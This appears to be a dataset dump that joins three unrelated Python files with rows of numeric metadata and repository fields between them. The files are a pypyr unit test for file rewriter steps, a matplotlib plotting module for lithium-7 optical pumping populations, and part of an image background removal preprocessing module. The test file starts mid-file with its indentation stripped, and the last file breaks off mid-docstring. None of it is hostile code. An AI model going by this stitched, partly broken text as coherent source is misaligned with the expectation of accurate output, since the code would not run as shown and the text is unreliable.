"""File rewriter runs files_in_to_out on rewriter with no out."""
context = Context({'root': {'in': 'inpathhere'}})
obj = FileInRewriterStep('blah.name', 'root', context)
assert obj.path_in == 'inpathhere'
assert not obj.path_out
assert obj.context == context
assert obj.logger.name == 'blah.name'
mock_rewriter = Mock(spec=FileRewriter)
obj.run_step(mock_rewriter)
mock_rewriter.files_in_to_out.assert_called_once_with(
in_path='inpathhere',
out_path=None)
def test_fileinrewriterstep_encoding_default():
"""Default encoding from config."""
context = Context({'root': {'in': 'inpathhere'}})
with patch('pypyr.config.config.default_encoding', 'arb'):
obj = FileInRewriterStep('blah.name', 'root', context)
assert obj.path_in == 'inpathhere'
assert not obj.path_out
assert obj.context == context
assert obj.logger.name == 'blah.name'
assert obj.encoding_in == 'arb'
assert obj.encoding_out == 'arb'
def test_fileinrewriterstep_encoding_in():
"""Explicitly set encoding in."""
context = Context({'root': {'in': 'inpathhere', 'encodingIn': 'arbIn'}})
with patch('pypyr.config.config.default_encoding', 'arb'):
obj = FileInRewriterStep('blah.name', 'root', context)
assert obj.path_in == 'inpathhere'
assert not obj.path_out
assert obj.context == context
assert obj.logger.name == 'blah.name'
assert obj.encoding_in == 'arbIn'
assert obj.encoding_out == 'arb'
def test_fileinrewriterstep_encoding_out():
"""Explicitly set encoding out."""
context = Context({'root': {'in': 'inpathhere', 'encodingOut': 'arbOut'}})
with patch('pypyr.config.config.default_encoding', 'arb'):
obj = FileInRewriterStep('blah.name', 'root', context)
assert obj.path_in == 'inpathhere'
assert not obj.path_out
assert obj.context == context
assert obj.logger.name == 'blah.name'
assert obj.encoding_in == 'arb'
assert obj.encoding_out == 'arbOut'
def test_fileinrewriterstep_encoding_in_out():
"""Explicitly set encoding in & out."""
context = Context({'root': {'in': 'inpathhere',
'encodingIn': 'arbIn',
'encodingOut': 'arbOut'}})
with patch('pypyr.config.config.default_encoding', 'arb'):
obj = FileInRewriterStep('blah.name', 'root', context)
assert obj.path_in == 'inpathhere'
assert not obj.path_out
assert obj.context == context
assert obj.logger.name == 'blah.name'
assert obj.encoding_in == 'arbIn'
assert obj.encoding_out == 'arbOut'
def test_fileinrewriterstep_encoding_substitutions_in_out():
"""Encoding works with substitutions for in and out."""
context = Context({
'encIn': 'arbIn',
'encOut': 'arbOut',
'root': {'in': 'inpathhere',
'encodingIn': '{encIn}',
'encodingOut': '{encOut}'}})
with patch('pypyr.config.config.default_encoding', 'arb'):
obj = FileInRewriterStep('blah.name', 'root', context)
assert obj.path_in == 'inpathhere'
assert not obj.path_out
assert obj.context == context
assert obj.logger.name == 'blah.name'
assert obj.encoding_in == 'arbIn'
assert obj.encoding_out == 'arbOut'
def test_fileinrewriterstep_bare_encoding_substitutions():
"""Encoding works with substitutions for bare encoding."""
context = Context({
'enc': 'arbenc',
'root': {'in': 'inpathhere',
'encoding': '{enc}'}})
with patch('pypyr.config.config.default_encoding', 'arb'):
obj = FileInRewriterStep('blah.name', 'root', context)
assert obj.path_in == 'inpathhere'
assert not obj.path_out
assert obj.context == context
assert obj.logger.name == 'blah.name'
assert obj.encoding_in == 'arbenc'
assert obj.encoding_out == 'arbenc'
# endregion FileInRewriterStep
# region ObjectRewriterStep
@patch('pypyr.steps.dsl.fileinoutrewriter.ObjectRewriter', spec=FileRewriter)
def test_objectrewriterstep_run_step(mock_rewriter):
"""Object rewriter runs files_in_to_out on object rewriter."""
context = Context({'root': {'in': 'inpathhere',
'out': 'outpathhere',
'encodingIn': 'encIn',
'encodingOut': 'encOut'}})
obj = ObjectRewriterStep('blah.name', 'root', context)
assert obj.path_in == 'inpathhere'
assert obj.path_out == 'outpathhere'
assert obj.context == context
assert obj.logger.name == 'blah.name'
assert obj.encoding_in == 'encIn'
assert obj.encoding_out == 'encOut'
mock_representer = Mock(spec=ObjectRepresenter)
obj.run_step(mock_representer)
# assert_called from mock will never think the generator/iter are equal,
# hence assert by hand.
assert mock_rewriter.mock_calls[0] == call(context.get_formatted_value,
mock_representer,
encoding_in='encIn',
encoding_out='encOut')
mock_rewriter.return_value.files_in_to_out.assert_called_once_with(
in_path='inpathhere',
out_path='outpathhere')
@patch('pypyr.steps.dsl.fileinoutrewriter.ObjectRewriter', spec=ObjectRewriter)
def test_objectrewriterstep_run_step_no_out(mock_rewriter):
"""Object rewriter runs files_in_to_out on object rewriter with no out."""
context = Context({'root': {'in': 'inpathhere'}})
obj = ObjectRewriterStep('blah.name', 'root', context)
assert obj.path_in == 'inpathhere'
assert not obj.path_out
assert obj.context == context
assert obj.logger.name == 'blah.name'
mock_representer = Mock(spec=ObjectRepresenter)
obj.run_step(mock_representer)
# assert_called from mock will never think the generator/iter are equal,
# hence assert by hand.
assert mock_rewriter.mock_calls[0] == call(context.get_formatted_value,
mock_representer,
encoding_in=None,
encoding_out=None)
mock_rewriter.return_value.files_in_to_out.assert_called_once_with(
in_path='inpathhere',
out_path=None)
# endregion ObjectRewriterStep
# region StreamRewriterStep
@patch('pypyr.steps.dsl.fileinoutrewriter.StreamRewriter', spec=FileRewriter)
def test_streamrewriterstep_run_step(mock_rewriter):
"""Stream rewriter runs files_in_to_out on stream rewriter."""
context = Context({'root': {'in': 'inpathhere',
'out': 'outpathhere',
'encodingIn': 'encIn',
'encodingOut': 'encOut'}})
obj = StreamRewriterStep('blah.name', 'root', context)
assert obj.path_in == 'inpathhere'
assert obj.path_out == 'outpathhere'
assert obj.context == context
assert obj.logger.name == 'blah.name'
assert obj.encoding_in == 'encIn'
assert obj.encoding_out == 'encOut'
obj.run_step()
# assert_called from mock will never think the generator/iter are equal,
# hence assert by hand.
assert mock_rewriter.mock_calls[0] == call(context.iter_formatted_strings,
encoding_in='encIn',
encoding_out='encOut')
mock_rewriter.return_value.files_in_to_out.assert_called_once_with(
in_path='inpathhere',
out_path='outpathhere')
@patch('pypyr.steps.dsl.fileinoutrewriter.StreamRewriter', spec=StreamRewriter)
def test_streamrewriterstep_run_step_no_out(mock_rewriter):
"""Stream rewriter runs files_in_to_out on stream rewriter."""
context = Context({'root': {'in': 'inpathhere', 'out': None}})
obj = StreamRewriterStep('blah.name', 'root', context)
assert obj.path_in == 'inpathhere'
assert not obj.path_out
assert obj.context == context
assert obj.logger.name == 'blah.name'
obj.run_step()
# assert_called from mock will never think the generator/iter are equal,
# hence assert by hand.
assert mock_rewriter.mock_calls[0] == call(context.iter_formatted_strings,
encoding_in=None,
encoding_out=None)
mock_rewriter.return_value.files_in_to_out.assert_called_once_with(
in_path='inpathhere',
out_path=None)
# endregion StreamRewriterStep
# region StreamReplacePairsRewriterStep
@patch('pypyr.steps.dsl.fileinoutrewriter.StreamRewriter', spec=StreamRewriter)
def test_streamreplacepairsrewriterstep_run_step(mock_rewriter):
"""Stream replace pairs rewriter runs files_in_to_out."""
context = Context({'root': {'in': 'inpathhere',
'out': 'outpathhere',
'replacePairs': {
'a': 'b',
'c': 'd'
},
'encodingIn': 'encIn',
'encodingOut': 'encOut'}})
obj = StreamReplacePairsRewriterStep('blah.name', 'root', context)
assert obj.path_in == 'inpathhere'
assert obj.path_out == 'outpathhere'
assert obj.context == context
assert obj.logger.name == 'blah.name'
assert obj.replace_pairs == {'a': 'b', 'c': 'd'}
assert obj.encoding_in == 'encIn'
assert obj.encoding_out == 'encOut'
iter_replace_strings_target = ('pypyr.steps.dsl.fileinoutrewriter.'
'StreamReplacePairsRewriterStep.'
'iter_replace_strings')
with patch(iter_replace_strings_target) as mock_iter:
obj.run_step()
# the rewriter should've been instantiated with the iter_replace_strings
# function.
mock_iter.assert_called_once_with({'a': 'b', 'c': 'd'})
assert mock_rewriter.mock_calls[0] == call(mock_iter.return_value,
encoding_in='encIn',
encoding_out='encOut')
mock_rewriter.return_value.files_in_to_out.assert_called_once_with(
in_path='inpathhere',
out_path='outpathhere')
@patch('pypyr.steps.dsl.fileinoutrewriter.StreamRewriter', spec=StreamRewriter)
def test_streamreplacepairsrewriterstep_run_step_no_out(mock_rewriter):
"""Stream replace pairs rewriter runs files_in_to_out with no out."""
context = Context({'root': {'in': 'inpathhere',
'replacePairs': {
'a': 'b',
'c': 'd'
},
'encoding': 'arb'}})
obj = StreamReplacePairsRewriterStep('blah.name', 'root', context)
assert obj.path_in == 'inpathhere'
assert not obj.path_out
assert obj.context == context
assert obj.logger.name == 'blah.name'
assert obj.replace_pairs == {'a': 'b', 'c': 'd'}
assert obj.encoding_in == 'arb'
assert obj.encoding_out == 'arb'
iter_replace_strings_target = ('pypyr.steps.dsl.fileinoutrewriter.'
'StreamReplacePairsRewriterStep.'
'iter_replace_strings')
with patch(iter_replace_strings_target) as mock_iter:
obj.run_step()
# the rewriter should've been instantiated with the iter_replace_strings
# function.
mock_iter.assert_called_once_with({'a': 'b', 'c': 'd'})
assert mock_rewriter.mock_calls[0] == call(mock_iter.return_value,
encoding_in='arb',
encoding_out='arb')
mock_rewriter.return_value.files_in_to_out.assert_called_once_with(
in_path='inpathhere',
out_path=None)
# region iter_replace_strings
def test_iter_replace_string_empties():
"""Nothing in, nothing out."""
in_string = ''
replace_pairs = {}
result = StreamReplacePairsRewriterStep.iter_replace_strings(replace_pairs)
assert not list(result(in_string))
def test_iter_replace_string_one_none():
"""One in, none out."""
in_string = ['one two three four five six seven eight']
replace_pairs = {'ten': '10'}
result = StreamReplacePairsRewriterStep.iter_replace_strings(replace_pairs)
assert list(result(in_string)) == in_string
def test_iter_replace_string_one_one():
"""One in, one out."""
in_string = ['one two three four five six seven eight']
replace_pairs = {'six': '6'}
result = StreamReplacePairsRewriterStep.iter_replace_strings(replace_pairs)
assert list(result(in_string))[
0] == 'one two three four five 6 seven eight'
def test_iter_replace_string_two_one():
"""Two in, one out."""
in_string = ['one two three four five six seven eight']
replace_pairs = {'six': '6', 'XXX': '3'}
result = StreamReplacePairsRewriterStep.iter_replace_strings(replace_pairs)
assert list(result(in_string))[
0] == 'one two three four five 6 seven eight'
def test_iter_replace_string_two_two():
"""Two in, two out."""
in_string = ['one two three four five six seven eight']
replace_pairs = {'six': '6', 'three': '3'}
result = StreamReplacePairsRewriterStep.iter_replace_strings(replace_pairs)
assert list(result(in_string))[0] == 'one two 3 four five 6 seven eight'
def test_iter_replace_string_instring_actually_iterates():
"""Iterates over an in iterable."""
in_string = ['one two three', 'four five six', 'seven eight nine']
replace_pairs = {'six': '6', 'three': '3'}
func = StreamReplacePairsRewriterStep.iter_replace_strings(replace_pairs)
result = list(func(in_string))
assert result[0] == 'one two 3'
assert result[1] == 'four five 6'
assert result[2] == 'seven eight nine'
def test_iter_replace_string_later_replace_earlier():
"""A later replacement replaces one from earlier."""
in_string = ['one two three', 'four five six', 'seven eight nine']
replace_pairs = {'six': '6', 'three': '3', '6': 'XXX'}
func = StreamReplacePairsRewriterStep.iter_replace_strings(replace_pairs)
result = list(func(in_string))
assert result[0] == 'one two 3'
assert result[1] == 'four five XXX'
assert result[2] == 'seven eight nine'
# endregion iter_replace_strings
# endregion StreamReplacePairsRewriterStep
| 37.45122
| 79
| 0.62732
| 2,047
| 18,426
| 5.439668
| 0.080606
| 0.067086
| 0.051729
| 0.03242
| 0.878761
| 0.844634
| 0.829097
| 0.805029
| 0.772339
| 0.755815
| 0
| 0.003632
| 0.252795
| 18,426
| 491
| 80
| 37.527495
| 0.805128
| 0.108759
| 0
| 0.748466
| 0
| 0
| 0.18278
| 0.040283
| 0
| 0
| 0
| 0
| 0.377301
| 1
| 0.082822
| false
| 0
| 0.018405
| 0
| 0.101227
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
73b4b97cfbd2b37253232ead5c0168f5b6331099
| 8,844
|
py
|
Python
|
opli7/plot.py
|
SuperYuLu/OpticalPumpingLithium7Dline
|
0b38c8ea755b922864f06e66151c43383ab24abb
|
[
"MIT"
] | 4
|
2019-12-12T00:10:33.000Z
|
2021-04-22T21:58:30.000Z
|
opli7/plot.py
|
SuperYuLu/OPLi7
|
0b38c8ea755b922864f06e66151c43383ab24abb
|
[
"MIT"
] | 8
|
2017-09-19T05:01:20.000Z
|
2017-10-16T03:24:52.000Z
|
opli7/plot.py
|
SuperYuLu/OpticalPumpingLithium7Dline
|
0b38c8ea755b922864f06e66151c43383ab24abb
|
[
"MIT"
] | 2
|
2020-02-07T22:56:46.000Z
|
2021-04-22T21:58:37.000Z
|
# plot.py ---
#
# Filename: plot.py
# Description:
# plot the population vs time for
# ground and excited states sublevels
# Author: Yu Lu
# Email: yulu@utexas.edu
# Github: https://github.com/SuperYuLu
#
# Created: Thu Oct 5 17:52:51 2017 (-0500)
# Version: V1.0
# Last-Updated: Fri Nov 16 00:51:57 2018 (-0600)
# By: yulu
# Update #: 109
#
import matplotlib.pyplot as plt
import os
def plotPopulation( clock, Dline, eStates, polarization1, polarization2, I1, I2, popG, popE, saveFig = True):
"""
plot population distrubution for ground and excited states
and specify condition in the title
optionally save the figure to ./img/ folder
"""
excitedState = '2P3halves(unresolved)' if Dline == 'D2' else eStates[0]
lw = 2
fig = plt.figure(figsize = (15, 15), dpi = 150)
ax1 = fig.add_subplot(211)
ax2 = fig.add_subplot(212)
for f, fmt in zip(['F1', 'F2'], ['-', '--']):# Ground states
fNum = int(f[-1])
for i in range(2 * fNum + 1):
ax1.plot(clock * 1e6, [x[0][i] for x in popG[f]], fmt, \
label = "F=" + str(fNum) + ", m=" + str(-fNum+ i), linewidth = lw)
ax1.set_title('Li7 ' + Dline + ' transition ground(top) and excited(bottom) hpf states population\n' \
+ 'F1 -> ' + excitedState + ': ' + polarization1 + ' pol. ' + str(I1) + ' mW/cm2 || ' \
+ 'F2 -> ' + excitedState + ': ' + polarization2 + ' pol. ' + str(I2) + ' mW/cm2', fontsize = 15)
ax1.set_xlabel('Time [us]')
ax1.legend(fontsize = 10)
for f in list(popE.keys()):#p.eStates:
fNum = int(f[-1])
for i in range(2 * fNum + 1):
ax2.plot(clock * 1e6, [x[0][i] for x in popE[f]], "-",\
label = "F=" + str(fNum) + ", m=" + str(-fNum+ i), linewidth = lw)
ax2.set_xlabel('Time [us]')
ax2.legend(fontsize = 10)
if saveFig:
if not os.path.isdir("./img/"):
os.mkdir("img")
fileName = "./img/Dline" + "_to" + excitedState + "_" + polarization1 + "_" + polarization2 + ".png"
fig.savefig(fileName)
print("[*]plots saved in " + fileName)
plt.show()
def plotParameterScan(scanPara, scanValues, steadyPopG, steadyPopE, steadyTime, saveFig = True):
lw = 2 # plot linewidth
fig = plt.figure(figsize = (15, 10), dpi=150)
# Ground states
ax1 = fig.add_subplot(211)
for f in ['F1', 'F2']:
fNum = int(f[-1])
for i in range(2 * fNum + 1):
ax1.plot(scanValues, [x[0][i] for x in steadyPopG[f]], "*--", \
label = "F=" + str(fNum) + ", m=" + str(-fNum+ i), linewidth = lw)
ax1.legend(fontsize = 12)
ax1.set_ylabel('Steady State Population')
ax1.set_xlabel('%s[default unit]' %scanPara)
ax1.set_title('Optical pumping parameter scan: %s' %scanPara)
# # Excited states
# print(steadyPopG)
# ax2 = fig.add_subplot(312)
# for f in list(steadyPopE.keys()):#p.eStates:
# fNum = int(f[-1])
# for i in range(2 * fNum + 1):
# ax2.plot(scanValues, [x[0][i] for x in steadyPopE[f]], "-",\
# label = "F=" + str(fNum) + ", m=" + str(-fNum+ i), linewidth = lw)
# ax2.set_xlabel('laser intensity [mw/cm^2]')
# ax2.legend(fontsize = 12)
# Steady states time
ax3 = fig.add_subplot(212)
ax3.plot(scanValues, steadyTime * 1e6, '^--')
ax1.set_xlabel('%s[default unit]' %scanPara)
ax3.set_ylabel('Time to reach steady state [us]')
if saveFig:
if not os.path.isdir("./img/"):
os.mkdir("img")
fileName = "./img/laser_intensity_scan.png"
fig.savefig(fileName)
print("[*]plots saved in ", fileName)
plt.show()
def plotIntensityScan(laserInten, steadyPopG, steadyPopE, steadyTime, saveFig = True):
import matplotlib.pyplot as plt
import os
lw = 2 # plot linewidth
fig = plt.figure(figsize = (15, 10), dpi=150)
# Ground states
ax1 = fig.add_subplot(211)
for f in ['F1', 'F2']:
fNum = int(f[-1])
for i in range(2 * fNum + 1):
ax1.plot(laserInten, [x[0][i] for x in steadyPopG[f]], "*--", \
label = "F=" + str(fNum) + ", m=" + str(-fNum+ i), linewidth = lw)
ax1.legend(fontsize = 12)
ax1.set_ylabel('Steady State Population')
ax1.set_title('Optical pumping under different laser intensities')
# # Excited states
# print(steadyPopG)
# ax2 = fig.add_subplot(312)
# for f in list(steadyPopE.keys()):#p.eStates:
# fNum = int(f[-1])
# for i in range(2 * fNum + 1):
# ax2.plot(laserInten, [x[0][i] for x in steadyPopE[f]], "-",\
# label = "F=" + str(fNum) + ", m=" + str(-fNum+ i), linewidth = lw)
# ax2.set_xlabel('laser intensity [mw/cm^2]')
# ax2.legend(fontsize = 12)
# Steady states time
ax3 = fig.add_subplot(212)
ax3.plot(laserInten, steadyTime * 1e6, '^--')
ax3.set_xlabel('laser intensity [mw/cm^2]')
ax3.set_ylabel('Time to reach steady state [us]')
if saveFig:
if not os.path.isdir("./img/"):
os.mkdir("img")
fileName = "./img/laser_intensity_scan.png"
fig.savefig(fileName)
print("[*]plots saved in ./img/" + fileName)
plt.show()
def plotDetuneScan(laserDetune, steadyPopG, steadyPopE, steadyTime, saveFig = True):
import matplotlib.pyplot as plt
import os
lw = 2 # plot linewidth
fig = plt.figure(figsize = (15, 10), dpi=150)
# Ground states
ax1 = fig.add_subplot(211)
for f in ['F1', 'F2']:
fNum = int(f[-1])
for i in range(2 * fNum + 1):
ax1.plot(laserDetune*1e-6, [x[0][i] for x in steadyPopG[f]], "*--", \
label = "F=" + str(fNum) + ", m=" + str(-fNum+ i), linewidth = lw)
ax1.legend(fontsize = 12)
ax1.set_ylabel('Steady State Population')
ax1.set_title('Optical pumping under different laser detune')
# # Excited states
# print(steadyPopG)
# ax2 = fig.add_subplot(312)
# for f in list(steadyPopE.keys()):#p.eStates:
# fNum = int(f[-1])
# for i in range(2 * fNum + 1):
# ax2.plot(laserInten, [x[0][i] for x in steadyPopE[f]], "-",\
# label = "F=" + str(fNum) + ", m=" + str(-fNum+ i), linewidth = lw)
# ax2.set_xlabel('laser intensity [mw/cm^2]')
# ax2.legend(fontsize = 12)
# Steady states time
ax3 = fig.add_subplot(212)
ax3.plot(laserDetune * 1e-6, steadyTime * 1e6, '^--')
ax3.set_xlabel('laser Detune [MHz]')
ax3.set_ylabel('Time to reach steady state [us]')
if saveFig:
if not os.path.isdir("./img/"):
os.mkdir("img")
fileName = "./img/laser_detune_scan.png"
fig.savefig(fileName)
print("[*]plots saved in ./img/" + fileName)
plt.show()
def plotPop_special( clock, Dline, eStates, polarization1, polarization2, I1, I2, popG, popE, saveFig = True):
"""
plot population distrubution for ground and excited states
and specify condition in the title
optionally save the figure to ./img/ folder
"""
import matplotlib.pyplot as plt
import os
excitedState = '2P3halves(unresolved)' if Dline == 'D2' else eStates[0]
lw = 3
fig = plt.figure(figsize = (15, 15), dpi = 150)
ax1 = fig.add_subplot(211)
ax2 = fig.add_subplot(212)
for f in ['F1', 'F2']:# Ground states
fNum = int(f[-1])
for i in range(2 * fNum + 1):
ax1.plot(clock * 1e6, [x[0][i] for x in popG[f]], "-", \
label = "F=" + str(fNum) + ", m=" + str(-fNum+ i), linewidth = lw)
ax1.set_title('Li7 ' + Dline + ' transition ground(top) and excited(bottom) hpf states population\n' \
+ 'F1 -> ' + excitedState + ': ' + polarization1 + ' pol. ' + str(I1) + ' mW/cm2 || ' \
+ 'F2 -> ' + excitedState + ': ' + polarization2 + ' pol. ' + str(I2) + ' mW/cm2', fontsize = 15)
ax1.set_xlabel('Time [us]')
ax1.set_ylim([0, 0.2])
ax1.set_xlim([0, 20])
ax1.legend(fontsize = 12)
for f in list(popE.keys()):#p.eStates:
fNum = int(f[-1])
for i in range(2 * fNum + 1):
ax2.plot(clock * 1e6, [x[0][i] for x in popE[f]], "-",\
label = "F=" + str(fNum) + ", m=" + str(-fNum+ i), linewidth = lw)
ax2.set_xlabel('Time [us]')
ax2.legend(fontsize = 12)
if saveFig:
if not os.path.isdir("./img/"):
os.mkdir("img")
fileName = "./img/Dline" + "_to" + excitedState + "_" + polarization1 + "_" + polarization2 + ".png"
fig.savefig(fileName)
print("[*]plots saved in " + fileName)
plt.show()
| 37.159664
| 116
| 0.54896
| 1,160
| 8,844
| 4.142241
| 0.156034
| 0.029136
| 0.035172
| 0.01873
| 0.893028
| 0.873673
| 0.8641
| 0.831634
| 0.82539
| 0.82539
| 0
| 0.049795
| 0.284713
| 8,844
| 237
| 117
| 37.316456
| 0.709769
| 0.224672
| 0
| 0.807143
| 0
| 0
| 0.155078
| 0.019125
| 0.014286
| 0
| 0
| 0
| 0
| 1
| 0.035714
| false
| 0
| 0.057143
| 0
| 0.092857
| 0.035714
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
73d9a4d147db37b03ec917ed6138217372500124
| 19,123
|
py
|
Python
|
libs/preprocessing.py
|
jinwyp/image-background-remove-tool
|
da156bab294df284d4daee69216288af87f24bc3
|
[
"Apache-2.0"
] | 585
|
2019-07-19T14:59:00.000Z
|
2022-03-31T05:39:30.000Z
|
libs/preprocessing.py
|
jinwyp/image-background-remove-tool
|
da156bab294df284d4daee69216288af87f24bc3
|
[
"Apache-2.0"
] | 54
|
2020-03-19T18:55:38.000Z
|
2022-03-12T00:34:57.000Z
|
libs/preprocessing.py
|
jinwyp/image-background-remove-tool
|
da156bab294df284d4daee69216288af87f24bc3
|
[
"Apache-2.0"
] | 164
|
2019-10-22T23:32:44.000Z
|
2022-03-31T05:39:29.000Z
|
"""
Name: Pre-processing class file
Description: This file contains pre-processing classes.
Version: [release][3.2]
Source url: https://github.com/OPHoperHPO/image-background-remove-tool
Author: Anodev (OPHoperHPO)[https://github.com/OPHoperHPO] .
License: Apache License 2.0
License:
Copyright 2020 OPHoperHPO
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import logging
import time
import numpy as np
from PIL import Image
from libs.strings import PREPROCESS_METHODS
logger = logging.getLogger(__name__)
def method_detect(method: str):
"""Detects which method to use and returns its object"""
if method in PREPROCESS_METHODS:
if method == "bbmd-maskrcnn":
return BoundingBoxDetectionWithMaskMaskRcnn()
elif method == "bbd-fastrcnn":
return BoundingBoxDetectionFastRcnn()
else:
return None
else:
return False
class BoundingBoxDetectionFastRcnn:
    """
    Image pre-processing method.

    Uses a Fast RCNN detector to locate object bounding boxes in the
    photograph, cuts each object out, removes the background from every
    crop separately and reassembles the final image from the parts.
    """

    def __init__(self):
        self.__fast_rcnn__ = FastRcnn()
        self.model = None
        self.prep_image = None
        self.orig_image = None

    @staticmethod
    def trans_paste(bg_img, fg_img, box=(0, 0)):
        """
        Inserts an image into another image while maintaining transparency.
        :param bg_img: Background pil image
        :param fg_img: Foreground pil image
        :param box: Bounding box
        :return: Pil Image
        """
        fg_img_trans = Image.new("RGBA", bg_img.size)
        fg_img_trans.paste(fg_img, box, mask=fg_img)
        new_img = Image.alpha_composite(bg_img, fg_img_trans)
        return new_img

    @staticmethod
    def __orig_object_border__(border, orig_image, resized_image, indent=16):
        """
        Rescales an object's bounding box back to original-image coordinates.
        :param indent: The boundary of the object will expand by this value.
        :param border: array consisting of the coordinates of the boundaries of the object
        :param orig_image: original pil image (only .size is read)
        :param resized_image: resized image ndarray (only .shape is read)
        :return: tuple consisting of the coordinates of the boundaries of the object
        """
        x_factor = resized_image.shape[1] / orig_image.size[0]
        y_factor = resized_image.shape[0] / orig_image.size[1]
        xmin, ymin, xmax, ymax = [int(x) for x in border]
        # Clamp the detector's box to the bounds of the resized image.
        xmin = max(xmin, 0)
        ymin = max(ymin, 0)
        xmax = min(xmax, resized_image.shape[1])
        ymax = min(ymax, resized_image.shape[0])
        # A degenerate (zero-sized) image would otherwise divide by zero.
        if x_factor == 0:
            x_factor = 1
        if y_factor == 0:
            y_factor = 1
        return (int(xmin / x_factor) - indent,
                int(ymin / y_factor) - indent,
                int(xmax / x_factor) + indent,
                int(ymax / y_factor) + indent)

    def run(self, model, prep_image, orig_image):
        """
        Runs an image preprocessing algorithm to improve background removal quality.
        :param model: The class of the neural network used to remove the background.
        :param prep_image: Prepared for the neural network image
        :param orig_image: Source image
        :returns: Image without background
        """
        _, resized_image, results = self.__fast_rcnn__.process_image(orig_image)
        classes = self.__fast_rcnn__.class_names
        bboxes = results['bboxes']
        ids = results['ids']
        scores = results['scores']
        if len(bboxes) < 1:
            # Nothing detected: fall back to plain background removal.
            return model.__get_output__(prep_image, orig_image)
        # The detector's output arrays must agree in length; otherwise fall back.
        if ids is not None and len(bboxes) != len(ids):
            return model.__get_output__(prep_image, orig_image)
        if scores is not None and len(bboxes) != len(scores):
            return model.__get_output__(prep_image, orig_image)
        objects = []
        for i, bbox in enumerate(bboxes):
            if scores is not None and scores.flat[i] < 0.5:
                continue  # low-confidence detection
            if ids is not None and ids.flat[i] < 0:
                continue  # invalid class id
            object_cls_id = int(ids.flat[i]) if ids is not None else -1
            # BUGFIX: require a non-negative index — the original test
            # `object_cls_id < len(classes)` let -1 slip through and
            # returned the wrong label from classes[-1].
            if classes is not None and 0 <= object_cls_id < len(classes):
                object_label = classes[object_cls_id]
            else:
                object_label = str(object_cls_id) if object_cls_id >= 0 else ''
            object_border = self.__orig_object_border__(bbox, orig_image, resized_image)
            objects.append([object_label, object_border])
        if len(objects) <= 1:
            # Zero or one object: standard whole-image removal works best.
            return model.__get_output__(prep_image, orig_image)
        obj_images = []
        for obj in objects:
            obj_crop = orig_image.crop(obj[1])
            # TODO: make a special algorithm to improve the removal of
            # background from images with people. Both branches of the
            # original code were identical, so all objects (including
            # "person") are processed the same way for now.
            obj_images.append([model.process_image(obj_crop), obj])
        image = Image.new("RGBA", orig_image.size)
        for obj in obj_images:
            image = self.trans_paste(image, obj[0], obj[1][1])
        return image
class BoundingBoxDetectionWithMaskMaskRcnn:
    """
    Image pre-processing method.

    Uses a Mask RCNN detector to obtain both bounding boxes and masks of
    the objects in the photograph, expands each mask by a few pixels,
    applies it, removes the background from every object separately and
    reassembles the final image from the parts.
    """

    def __init__(self):
        self.__mask_rcnn__ = MaskRcnn()
        self.model = None
        self.prep_image = None
        self.orig_image = None

    @staticmethod
    def __mask_extend__(mask, indent=10):
        """
        Extends the mask of an object horizontally around 0->1 / 1->0 edges.
        :param mask: 8-bit ndarray mask (modified in place)
        :param indent: Indent on which to expand the mask
        :return: extended 8-bit mask ndarray
        """
        # TODO: Rewrite this function.
        # NOTE(review): `old_val` carries over between rows and the inner
        # loop breaks after the first closing edge of a row — kept exactly
        # as-is to preserve the original behaviour.
        height, weight = mask.shape
        old_val = 0
        for h in range(height):
            for w in range(weight):
                val = mask[h, w]
                if val == 1 and old_val == 0:
                    for i in range(1, indent + 1):
                        if w - i > 0:
                            mask[h, w - i] = 1
                    old_val = val
                elif val == 0 and old_val == 1:
                    if weight - w >= indent:
                        for i in range(0, indent):
                            mask[h, w + i] = 1
                    else:
                        for i in range(0, weight - w):
                            mask[h, w + i] = 1
                    old_val = val
                    break
        return mask

    @staticmethod
    def trans_paste(bg_img, fg_img, box=(0, 0)):
        """
        Inserts an image into another image while maintaining transparency.
        :param bg_img: Background pil image
        :param fg_img: Foreground pil image
        :param box: Bounding box
        :return: Pil Image
        """
        fg_img_trans = Image.new("RGBA", bg_img.size)
        fg_img_trans.paste(fg_img, box, mask=fg_img)
        new_img = Image.alpha_composite(bg_img, fg_img_trans)
        return new_img

    @staticmethod
    def __orig_object_border__(border, orig_image, resized_image, indent=16):
        """
        Rescales an object's bounding box back to original-image coordinates.
        :param indent: The boundary of the object will expand by this value.
        :param border: array consisting of the coordinates of the boundaries of the object
        :param orig_image: original pil image (only .size is read)
        :param resized_image: resized image ndarray (only .shape is read)
        :return: tuple consisting of the coordinates of the boundaries of the object
        """
        x_factor = resized_image.shape[1] / orig_image.size[0]
        y_factor = resized_image.shape[0] / orig_image.size[1]
        xmin, ymin, xmax, ymax = [int(x) for x in border]
        # Clamp the detector's box to the bounds of the resized image.
        xmin = max(xmin, 0)
        ymin = max(ymin, 0)
        xmax = min(xmax, resized_image.shape[1])
        ymax = min(ymax, resized_image.shape[0])
        # A degenerate (zero-sized) image would otherwise divide by zero.
        if x_factor == 0:
            x_factor = 1
        if y_factor == 0:
            y_factor = 1
        return (int(xmin / x_factor) - indent,
                int(ymin / y_factor) - indent,
                int(xmax / x_factor) + indent,
                int(ymax / y_factor) + indent)

    @staticmethod
    def __apply_mask__(image, mask):
        """
        Applies a mask to an image: pixels where mask == 0 are painted
        white (255) in the first three channels.
        :param image: Pil image
        :param mask: 8 bit Mask ndarray
        :return: Pil Image
        """
        image = np.array(image)
        for channel in range(3):
            image[:, :, channel] = np.where(
                mask == 0,
                255,
                image[:, :, channel]
            )
        return Image.fromarray(image)

    def run(self, model, prep_image, orig_image):
        """
        Runs an image preprocessing algorithm to improve background removal quality.
        :param model: The class of the neural network used to remove the background.
